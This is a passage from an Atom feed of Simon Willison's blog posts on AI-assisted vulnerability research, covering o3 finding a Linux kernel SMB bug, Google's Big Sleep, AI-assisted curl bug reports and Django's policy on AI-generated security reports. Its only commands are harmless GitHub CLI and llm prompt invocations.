&lt;p&gt;&lt;a href="https://www.axios.com/2026/02/05/anthropic-claude-opus-46-software-hunting"&gt;Axios: Anthropic's Claude Opus 4.6 uncovers 500 zero-day flaws in open-source&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I think vulnerability research might be THE MOST LLM-amenable software engineering problem. Pattern-driven. Huge corpus of operational public patterns. Closed loops. Forward progress from stimulus/response tooling. Search problems.&lt;/p&gt;
&lt;p&gt;Vulnerability research outcomes are in THE MODEL CARDS for frontier labs. Those companies have so much money they're literally distorting the economy. Money buys vuln research outcomes. Why would you think they were faking any of this?&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/tqbf/status/2019493645888462993"&gt;Thomas Ptacek&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="thomas-ptacek"/><category term="anthropic"/><category term="claude"/><category term="security"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="open-source"/><category term="ai-security-research"/></entry><entry><title>Daniel Stenberg's note on AI assisted curl bug reports</title><link href="https://simonwillison.net/2025/Oct/2/curl/#atom-tag" rel="alternate"/><published>2025-10-02T15:00:09+00:00</published><updated>2025-10-02T15:00:09+00:00</updated><id>https://simonwillison.net/2025/Oct/2/curl/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://mastodon.social/@bagder/115241241075258997"&gt;Daniel Stenberg&amp;#x27;s note on AI assisted curl bug reports&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Curl maintainer Daniel Stenberg on Mastodon:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Joshua Rogers sent us a &lt;em&gt;massive&lt;/em&gt; list of potential issues in #curl that he found using his set of AI assisted tools. Code analyzer style nits all over. Mostly smaller bugs, but still bugs and there could be one or two actual security flaws in there. Actually truly awesome findings.&lt;/p&gt;
&lt;p&gt;I have already landed 22(!) bugfixes thanks to this, and I have over twice that amount of issues left to go through. Wade through perhaps.&lt;/p&gt;
&lt;p&gt;Credited "Reported in Joshua's sarif data" if you want to look for yourself&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I searched for &lt;code&gt;is:pr Joshua sarif data is:closed&lt;/code&gt; in the &lt;code&gt;curl&lt;/code&gt; GitHub repository &lt;a href="https://github.com/curl/curl/pulls?q=is%3Apr+Joshua+sarif+data+is%3Aclosed"&gt;and found 49 completed PRs so far&lt;/a&gt;.&lt;/p&gt;
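&lt;p&gt;The GitHub CLI can run roughly the same search from the terminal, if you prefer that to the web UI:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gh pr list --repo curl/curl --state closed --search 'Joshua sarif data' --limit 100
&lt;/code&gt;&lt;/pre&gt;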
&lt;p&gt;Joshua's own post about this: &lt;a href="https://joshua.hu/llm-engineer-review-sast-security-ai-tools-pentesters"&gt;Hacking with AI SASTs: An overview of 'AI Security Engineers' / 'LLM Security Scanners' for Penetration Testers and Security Teams&lt;/a&gt;. The &lt;a href="https://joshua.hu/files/AI_SAST_PRESENTATION.pdf"&gt;accompanying presentation PDF&lt;/a&gt; includes screenshots of some of the tools he used, which included Almanax, Amplify Security, Corgea, Gecko Security, and ZeroPath. Here's his vendor summary:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a presentation slide titled &amp;quot;General Results&amp;quot; with &amp;quot;RACEDAY&amp;quot; in top right corner. Three columns compare security tools: &amp;quot;Almanax&amp;quot; - Excellent single-function &amp;quot;obvious&amp;quot; results. Not so good at large/complicated code. Great at simple malicious code detection. Raw-bones solutions, not yet a mature product. &amp;quot;Corgea&amp;quot; - Discovered nearly all &amp;quot;test-case&amp;quot; issues. Discovered real vulns in big codebases. Tons of F/Ps. Malicious detection sucks. Excellent UI &amp;amp; reports. Tons of bugs in UI. PR reviews failed hard. &amp;quot;ZeroPath&amp;quot; - Discovered all &amp;quot;test-case&amp;quot; issues. Intimidatingly good bug and vuln findings. Excellent PR scanning. In-built issue chatbot. Even better with policies. Extremely slow UI. Complex issue descriptions." src="https://static.simonwillison.net/static/2025/security-vendor-slide.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;This result is especially notable because Daniel has been outspoken about the deluge of junk AI-assisted reports on "security issues" that curl has received in the past. In &lt;a href="https://simonwillison.net/2025/May/6/daniel-stenberg/"&gt;May this year&lt;/a&gt;, concerning HackerOne:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We now ban every reporter INSTANTLY who submits reports we deem AI slop. A threshold has been reached. We are effectively being DDoSed. If we could, we would charge them for this waste of our time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;He also wrote about this &lt;a href="https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/"&gt;in January 2024&lt;/a&gt;, where he included this note:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I do however suspect that if you just add an ever so tiny (intelligent) human check to the mix, the use and outcome of any such tools will become so much better. I suspect that will be true for a long time into the future as well.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is yet another illustration of how much more interesting these tools are when experienced professionals use them to augment their existing skills.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=45449348"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="curl"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="daniel-stenberg"/><category term="ai-assisted-programming"/><category term="ai-ethics"/><category term="ai-security-research"/></entry><entry><title>Quoting Django’s security policies</title><link href="https://simonwillison.net/2025/Jul/11/django-security-policies/#atom-tag" rel="alternate"/><published>2025-07-11T16:51:08+00:00</published><updated>2025-07-11T16:51:08+00:00</updated><id>https://simonwillison.net/2025/Jul/11/django-security-policies/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://docs.djangoproject.com/en/dev/internals/security/#ai-assisted-reports"&gt;&lt;p&gt;Following the widespread availability of large language models (LLMs), the Django Security Team has received a growing number of security reports generated partially or entirely using such tools. Many of these contain inaccurate, misleading, or fictitious content. While AI tools can help draft or analyze reports, they must not replace human understanding and review.&lt;/p&gt;
&lt;p&gt;If you use AI tools to help prepare a report, you must:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Disclose&lt;/strong&gt; which AI tools were used and specify what they were used for (analysis, writing the description, writing the exploit, etc).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Verify&lt;/strong&gt; that the issue describes a real, reproducible vulnerability that otherwise meets these reporting guidelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Avoid&lt;/strong&gt; fabricated code, placeholder text, or references to non-existent Django features.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Reports that appear to be unverified AI output will be closed without response. Repeated low-quality submissions may result in a ban from future reporting&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://docs.djangoproject.com/en/dev/internals/security/#ai-assisted-reports"&gt;Django’s security policies&lt;/a&gt;, on AI-Assisted Reports&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-misuse"&gt;ai-misuse&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-misuse"/><category term="ai-ethics"/><category term="open-source"/><category term="security"/><category term="generative-ai"/><category term="ai"/><category term="django"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation</title><link href="https://simonwillison.net/2025/May/24/sean-heelan/#atom-tag" rel="alternate"/><published>2025-05-24T21:09:40+00:00</published><updated>2025-05-24T21:09:40+00:00</updated><id>https://simonwillison.net/2025/May/24/sean-heelan/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sean.heelan.io/2025/05/22/how-i-used-o3-to-find-cve-2025-37899-a-remote-zeroday-vulnerability-in-the-linux-kernels-smb-implementation/"&gt;How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Sean Heelan:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The vulnerability [o3] found is CVE-2025-37899 (fix &lt;a href="https://github.com/torvalds/linux/commit/2fc9feff45d92a92cd5f96487655d5be23fb7e2b"&gt;here&lt;/a&gt;), a use-after-free in the handler for the SMB 'logoff' command. Understanding the vulnerability requires reasoning about concurrent connections to the server, and how they may share various objects in specific circumstances. o3 was able to comprehend this and spot a location where a particular object that is not reference counted is freed while still being accessible by another thread. As far as I'm aware, this is the first public discussion of a vulnerability of that nature being found by a LLM.&lt;/p&gt;
&lt;p&gt;Before I get into the technical details, the main takeaway from this post is this: with o3 LLMs have made a leap forward in their ability to reason about code, and if you work in vulnerability research you should start paying close attention. If you're an expert-level vulnerability researcher or exploit developer the machines aren't about to replace you. In fact, it is quite the opposite: they are now at a stage where they can make you &lt;em&gt;significantly&lt;/em&gt; more efficient and effective. If you have a problem that can be represented in fewer than 10k lines of code there is a reasonable chance o3 can either solve it, or help you solve it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Sean used my &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; tool to help find the bug! He ran it against the prompts he shared &lt;a href="https://github.com/SeanHeelan/o3_finds_cve-2025-37899"&gt;in this GitHub repo&lt;/a&gt; using the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm --sf system_prompt_uafs.prompt              \
    -f session_setup_code.prompt                \
    -f ksmbd_explainer.prompt                   \
    -f session_setup_context_explainer.prompt   \
    -f audit_request.prompt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sean ran the same prompt 100 times, so I'm glad he was using the new, more efficient &lt;a href="https://simonwillison.net/2025/Apr/7/long-context-llm/#improving-llm-s-support-for-long-context-models"&gt;fragments mechanism&lt;/a&gt;.&lt;/p&gt;
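&lt;p&gt;Repeating a run like that 100 times is only a shell loop away - here's a hypothetical harness, not the one Sean actually used, with invented output filenames:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for i in $(seq 1 100); do
  llm --sf system_prompt_uafs.prompt \
      -f session_setup_code.prompt \
      -f ksmbd_explainer.prompt \
      -f session_setup_context_explainer.prompt \
      -f audit_request.prompt &amp;gt; "run_$i.md"
done
&lt;/code&gt;&lt;/pre&gt;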
&lt;p&gt;o3 found his first, already-known vulnerability in 8 out of 100 runs - but found the brand new one in just 1 of the 100 runs it performed with a larger context.&lt;/p&gt;
&lt;p&gt;I thoroughly enjoyed this snippet which perfectly captures how I feel when I'm iterating on prompts myself:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In fact my entire system prompt is speculative in that I haven’t ran a sufficient number of evaluations to determine if it helps or hinders, so consider it equivalent to me saying a prayer, rather than anything resembling science or engineering.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Sean's conclusion with respect to the utility of these models for security research:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If we were to never progress beyond what o3 can do right now, it would still make sense for everyone working in VR [Vulnerability Research] to figure out what parts of their work-flow will benefit from it, and to build the tooling to wire it in. Of course, part of that wiring will be figuring out how to deal with the signal to noise ratio of ~1:50 in this case, but that’s something we are already making progress at.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=44081338"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/o3"&gt;o3&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/system-prompts"&gt;system-prompts&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="llms"/><category term="llm"/><category term="llm-reasoning"/><category term="o3"/><category term="system-prompts"/><category term="ai-security-research"/></entry><entry><title>Quoting Daniel Stenberg</title><link href="https://simonwillison.net/2025/May/6/daniel-stenberg/#atom-tag" rel="alternate"/><published>2025-05-06T15:12:17+00:00</published><updated>2025-05-06T15:12:17+00:00</updated><id>https://simonwillison.net/2025/May/6/daniel-stenberg/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.linkedin.com/posts/danielstenberg_hackerone-curl-activity-7324820893862363136-glb1"&gt;&lt;p&gt;That's it. I've had it. I'm putting my foot down on this craziness.&lt;/p&gt;
&lt;p&gt;1. Every reporter submitting security reports on #Hackerone for #curl now needs to answer this question:&lt;/p&gt;

&lt;p&gt;"Did you use an AI to find the problem or generate this submission?"&lt;/p&gt;
&lt;p&gt;(and if they do select it, they can expect a stream of proof of actual intelligence follow-up questions)&lt;/p&gt;
&lt;p&gt;2. We now ban every reporter INSTANTLY who submits reports we deem AI slop. A threshold has been reached. We are effectively being DDoSed. If we could, we would charge them for this waste of our time.&lt;/p&gt;

&lt;p&gt;We still have not seen a single valid security report done with AI help.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.linkedin.com/posts/danielstenberg_hackerone-curl-activity-7324820893862363136-glb1"&gt;Daniel Stenberg&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-misuse"&gt;ai-misuse&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/slop"&gt;slop&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-misuse"/><category term="ai"/><category term="llms"/><category term="ai-ethics"/><category term="daniel-stenberg"/><category term="slop"/><category term="security"/><category term="curl"/><category term="generative-ai"/><category term="ai-security-research"/></entry><entry><title>From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code</title><link href="https://simonwillison.net/2024/Nov/1/from-naptime-to-big-sleep/#atom-tag" rel="alternate"/><published>2024-11-01T20:15:39+00:00</published><updated>2024-11-01T20:15:39+00:00</updated><id>https://simonwillison.net/2024/Nov/1/from-naptime-to-big-sleep/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html"&gt;From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Google's &lt;a href="https://en.wikipedia.org/wiki/Project_Zero"&gt;Project Zero&lt;/a&gt; security team used a system based around Gemini 1.5 Pro to find a previously unreported security vulnerability in SQLite (a stack buffer underflow), in time for it to be fixed prior to making it into a release.&lt;/p&gt;
&lt;p&gt;A key insight here is that LLMs are well suited for checking for new variants of previously reported vulnerabilities:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A key motivating factor for Naptime and now for Big Sleep has been the continued in-the-wild discovery of exploits for variants of previously found and patched vulnerabilities. As this trend continues, it's clear that fuzzing is not succeeding at catching such variants, and that for attackers, manual variant analysis is a cost-effective approach.&lt;/p&gt;
&lt;p&gt;We also feel that this variant-analysis task is a better fit for current LLMs than the more general open-ended vulnerability research problem. By providing a starting point – such as the details of a previously fixed vulnerability – we remove a lot of ambiguity from vulnerability research, and start from a concrete, well-founded theory: "This was a previous bug; there is probably another similar one somewhere".&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;LLMs are great at pattern matching. It turns out feeding in a pattern describing a prior vulnerability is a great way to identify potential new ones.
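&lt;p&gt;You can experiment with a very crude version of that variant-analysis pattern using my &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; tool - this is a sketch with invented file names (and it assumes the llm-gemini plugin is installed), not anything like the actual Big Sleep harness:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -m gemini-1.5-pro-latest \
  -s 'You are auditing C code for new variants of a previously fixed vulnerability.' \
  -f prior_vulnerability_writeup.md \
  -f suspect_source_file.c \
  'Is there a similar bug anywhere in this code? Point to the exact code path.'
&lt;/code&gt;&lt;/pre&gt;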

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=42017771"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-engineering"&gt;prompt-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="google"/><category term="security"/><category term="sqlite"/><category term="ai"/><category term="prompt-engineering"/><category term="generative-ai"/><category term="llms"/><category term="gemini"/><category term="ai-security-research"/></entry></feed>